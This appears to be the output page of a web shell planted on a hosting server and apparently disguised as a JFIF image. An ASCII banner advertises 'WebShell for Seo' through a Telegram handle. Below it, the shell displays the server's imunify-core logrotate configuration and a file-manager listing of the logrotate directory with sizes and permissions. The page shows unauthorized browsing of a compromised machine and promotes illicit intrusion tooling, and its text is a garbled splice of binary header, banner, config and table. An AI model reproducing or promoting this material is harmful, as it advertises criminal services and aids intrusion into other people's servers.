����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# DEF-26794: agent log rotation, replacing the in-process
# RotatingCompressionFileHandler.
#
# Uses copytruncate so the agent's open fd remains valid across rotation
# (same inode, just truncated) — no postrotate signal needed and no risk
# of the agent writing into a renamed/deleted file. The brief copy↔truncate
# window may drop a handful of bytes under heavy logging; acceptable for
# debug logs.
#
# Shipped by imunify-core because the agent code (defence360agent) that
# writes these files is shipped by imunify-core; this keeps the rotation
# config co-located with the writer for both Imunify360 and ImunifyAV
# installations.
#
# error.log is intentionally NOT listed here: the Go resident agent
# (src/resident-agent/errorlog.go) owns rotation for that file with its
# own size-based rename chain. Letting logrotate also touch error.log
# means two writers compete on error.log.{1,2,...}.gz, and the Go agent's
# next rotate() copyFile(error.log, error.log.1) would clobber an
# uncompressed archive that logrotate had just produced under
# `delaycompress`.
/var/log/imunify360/network.log
/var/log/imunify360/debug.log
/var/log/imunify360/console.log
/var/log/imunify360/hook.log
/var/log/imunify360/process_message.log
/var/log/imunify360/acronis-installer.log
/var/log/imunify360_user_logs/*/*.log {
# Non-root invocations (e.g. CageFS user contexts) route logs to a
# per-user directory; the previous in-process handler enforced size
# limits there too, so cover them with the same policy. The Go resident
# agent only runs as root and never writes to these paths, so no
# dual-rotation conflict applies — `error.log` is safe to include here.
daily
maxsize 60M
rotate 5
# Drop archives older than 30 days regardless of position. This also
# eventually purges leftovers from the old in-process rotation
# (console.log.6.gz, console.log.7.gz, ...) that the fixed rename
# chain never touched.
maxage 30
missingok
notifempty
compress
delaycompress
copytruncate
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| apache | File | 195 B | 0640 |
|
| btmp | File | 130 B | 0644 |
|
| chrony | File | 160 B | 0644 |
|
| cloudlinux-backup-utils | File | 226 B | 0644 |
|
| comet_backup | File | 140 B | 0644 |
|
| comet_backup_jobs_helper | File | 251 B | 0644 |
|
| dnf | File | 88 B | 0644 |
|
| dpkg | File | 112 B | 0644 |
|
| ea-php80-php-fpm | File | 257 B | 0644 |
|
| ea-php81-php-fpm | File | 257 B | 0644 |
|
| ea-php82-php-fpm | File | 257 B | 0644 |
|
| ea-php83-php-fpm | File | 257 B | 0644 |
|
| ea-php84-php-fpm | File | 257 B | 0644 |
|
| ea-php85-php-fpm | File | 257 B | 0644 |
|
| exim | File | 405 B | 0644 |
|
| imunify-core | File | 2.01 KB | 0644 |
|
| imunify-realtime-av-imrt2 | File | 652 B | 0644 |
|
| imunify360 | File | 351 B | 0644 |
|
| imunify360-antivirus | File | 1.06 KB | 0644 |
|
| imunify360-pam | File | 482 B | 0644 |
|
| imunify360-php-daemon | File | 364 B | 0644 |
|
| imunify360-unified-access-logger | File | 241 B | 0644 |
|
| imunify360-webshield | File | 411 B | 0644 |
|
| jetbackup5api | File | 170 B | 0600 |
|
| jetbackup5d | File | 304 B | 0600 |
|
| jetmongod | File | 290 B | 0644 |
|
| kvm_stat | File | 162 B | 0644 |
|
| mariadb | File | 1.82 KB | 0644 |
|
| modsecurity_logs | File | 277 B | 0644 |
|
| named | File | 368 B | 0644 |
|
| nscd_logs | File | 180 B | 0644 |
|
| ossec-hids | File | 595 B | 0644 |
|
| rsyslog | File | 226 B | 0644 |
|
| sssd | File | 289 B | 0644 |
|
| sw-engine | File | 114 B | 0644 |
|
| wp-toolkit | File | 163 B | 0644 |
|
| wp-toolkit-action-logs | File | 0 B | 0644 |
|
| wtmp | File | 145 B | 0644 |
|